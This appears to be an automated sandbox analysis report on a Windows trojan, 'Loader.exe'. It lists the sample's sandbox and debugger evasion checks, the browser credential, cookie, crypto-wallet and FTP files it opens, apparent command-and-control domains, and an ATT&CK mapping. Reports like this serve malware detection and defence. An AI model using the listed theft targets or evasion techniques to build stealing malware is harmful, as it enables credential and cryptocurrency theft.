              Source: C:\Users\user\Desktop\Loader.exe | Code function: 1_2_00F069BD push 03FFFFFFh; ret | 1_2_00F069C2
              Source: C:\Users\user\Desktop\Loader.exe | Code function: 1_2_00F05581 pushad ; iretd | 1_2_00F05582
              Source: C:\Users\user\Desktop\Loader.exe | Code function: 1_2_00F04692 push 81FFFFFFh; ret | 1_2_00F04697
              Source: C:\Users\user\Desktop\Loader.exe | Code function: 1_2_011CFE44 push ecx; ret | 1_2_011CFE57
              Source: C:\Users\user\Desktop\Loader.exe | Code function: 1_2_0043D950 push eax; mov dword ptr [esp], 71708F5Eh | 1_2_0043D951
              Source: C:\Users\user\Desktop\Loader.exe | Code function: 1_2_0043AD30 push eax; mov dword ptr [esp], ADAEAFA0h | 1_2_0043AD3E
              Source: C:\Users\user\Desktop\Loader.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\Loader.exe | System information queried: FirmwareTableInformation
              Source: C:\Users\user\Desktop\Loader.exe TID: 3668 | Thread sleep time: -120000s >= -30000s
              Source: C:\Users\user\Desktop\Loader.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\Loader.exe | Code function: 1_2_011C9255 FindFirstFileExW, | 1_2_011C9255
              Source: C:\Users\user\Desktop\Loader.exe | Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\Loader.exe | Code function: 1_2_0043C330 LdrInitializeThunk, | 1_2_0043C330
              Source: C:\Users\user\Desktop\Loader.exe | Code function: 1_2_011C47BC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 1_2_011C47BC
              Source: C:\Users\user\Desktop\Loader.exe | Code function: 1_2_00AFEB50 mov eax, dword ptr fs:[00000030h] | 1_2_00AFEB50
              Source: C:\Users\user\Desktop\Loader.exe | Code function: 1_2_00AFF790 mov eax, dword ptr fs:[00000030h] | 1_2_00AFF790
              Source: C:\Users\user\Desktop\Loader.exe | Code function: 1_2_011C4330 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 1_2_011C4330
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_011C47BC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_011C47BC
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_011C8BE4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_011C8BE4

HIPS / PFW / Operating System Protection Evasion

Source: Loader.exe, 00000001.00000002.2711429352.0000000000AB0000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: debonairnukk.xyz
Source: Loader.exe, 00000001.00000002.2711429352.0000000000AB0000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: diffuculttan.xyz
Source: Loader.exe, 00000001.00000002.2711429352.0000000000AB0000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: effecterectz.xyz
Source: Loader.exe, 00000001.00000002.2711429352.0000000000AB0000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: deafeninggeh.biz
Source: Loader.exe, 00000001.00000002.2711429352.0000000000AB0000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: immureprech.biz
Source: C:\Users\user\Desktop\Loader.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Loader.exe | Code function: 1_2_011C46A3 GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, 1_2_011C46A3
Source: C:\Users\user\Desktop\Loader.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Loader.exe, 00000001.00000003.2660783647.000000000147E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2660737993.0000000001475000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2712486611.00000000013D0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\Loader.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: Loader.exe PID: 6448, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\Loader.exe | Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\Desktop\Loader.exe | Directory queried: C:\Users\user\Documents\TTCBKWZYOC
Source: Yara match | File source: Process Memory Space: Loader.exe PID: 6448, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: Loader.exe PID: 6448, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
ATT&CK matrix, listed per tactic (a leading number is the signature count the report attached to that technique):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 2 Windows Management Instrumentation; 1 PowerShell; At; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 11 Virtualization/Sandbox Evasion; 11 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 DLL Side-Loading; Software Packing; Steganography
Credential Access: 2 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 1 System Time Discovery; 131 Security Software Discovery; 11 Virtualization/Sandbox Evasion; 1 Process Discovery; 11 File and Directory Discovery; 23 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 1 Screen Capture; 1 Archive Collected Data; 31 Data from Local System; 2 Clipboard Data; Keylogging; GUI Input Capture
Command and Control: 21 Encrypted Channel; 2 Non-Application Layer Protocol; 113 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Source | Detection | Scanner | Label | Link
Loader.exe | 58% | ReversingLabs | Win32.Trojan.CrypterX |
Loader.exe | 100% | Joe Sandbox ML | |

No Antivirus matches in the remaining detection tables.
              NameIPActiveMaliciousAntivirus DetectionReputation
              ingreem-eilish.biz
              104.21.90.135
              truetrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                sordid-snaked.cyoufalse
                  high
                  awake-weaves.cyoufalse
                    high
                    immureprech.bizfalse
                      high
                      deafeninggeh.bizfalse
                        high
                        debonairnukk.xyzfalse
                          high
                          diffuculttan.xyzfalse
                            high
                            effecterectz.xyzfalse
                              high
                              wrathful-jammy.cyoufalse
                                high
                                https://ingreem-eilish.biz/apitrue
                                  unknown
                                  ingreem-eilish.biztrue
                                    unknown
Name | Source | Malicious | Reputation
https://duckduckgo.com/chrome_newtab | Loader.exe, 00000001.00000003.2568059409.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568126964.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568255337.00000000036FA000.00000004.00000800.00020000.00000000.sdmp | false | high
https://duckduckgo.com/ac/?q= | Loader.exe, 00000001.00000003.2568059409.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568126964.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568255337.00000000036FA000.00000004.00000800.00020000.00000000.sdmp | false | high
https://ingreem-eilish.biz/&& | Loader.exe, 00000001.00000003.2640883555.000000000146F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2641218007.0000000001476000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2640956088.0000000001474000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | Loader.exe, 00000001.00000003.2568059409.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568126964.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568255337.00000000036FA000.00000004.00000800.00020000.00000000.sdmp | false | high
https://ingreem-eilish.biz/ | Loader.exe, 00000001.00000002.2712486611.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2567538989.000000000145D000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2712486611.0000000001457000.00000004.00000020.00020000.00000000.sdmp | false | unknown
